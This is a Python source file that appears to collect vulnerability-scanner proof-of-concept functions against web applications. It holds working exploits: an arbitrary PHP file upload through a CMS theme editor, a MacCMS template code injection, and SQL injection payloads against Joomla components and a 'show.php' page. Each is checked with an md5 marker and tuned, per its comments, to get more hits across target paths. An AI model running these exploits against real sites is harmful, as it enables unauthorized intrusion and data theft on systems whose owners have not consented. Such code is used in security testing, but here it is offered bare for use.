def poc(url):
url = url if '://' in url else 'http://' + url
path = url + '/dapur/apps/app_theme/libs/'
filename = randomString(5) + '.php'
upload_path = path + 'save_file.php'
shell_path = path + filename
plain, cipher = randomMD5()
post_data = {
'content': '<?php echo md5("{}");?>'.format(plain),
'src': filename
}
header_data = {'Referer': 'http://localhost/'}
try:
r = requests.post(url=upload_path,
data=post_data,
headers=header_data,
timeout=3)
shell = requests.get(shell_path)
if r.status_code is 200 and cipher in shell.content:
return True
except Exception:
return False
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
try:
p, c = randomMD5()
payload = "/index.php?m=vod-search&wd={if-A:die(md5(%s))}{endif-A}" % (p)
if c in requests.get(url + payload, allow_redirects=False).text:
return '[maccms]' + url
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
for each in iterate_path(url):
plain, cipher = randomMD5(3)
payload = "/index.php?option=com_videoflow&task=search&vs=1&searchword=-3920%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x71786a7a71%2C%28MID%28%28IFNULL%28CAST%28md5%28{plain}%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x716b6b7a71%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23".format(
plain=plain)
if '?' in each:
continue
target_url = url.rstrip('/') + payload
try:
r = requests.get(target_url, timeout=10)
if cipher in r.content:
return each
except Exception, e:
pass
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
plain, cipher = randomMD5()
# 用全部字段验证,增加70%结果
payload = "/about/show.php?lang=en&id=-2864 UNION ALL SELECT " + (("md5(%s)," % plain) * 27).rstrip(',') + '--'
for each in iterate_path(url): # 对每个子路径尝试,增加20%结果
target = each.rstrip('/') + payload
try:
r = requests.get(target, timeout=20)
if r.status_code == 200 and cipher in r.content:
return url
except Exception:
pass # 从break改为pass增加10%结果
return False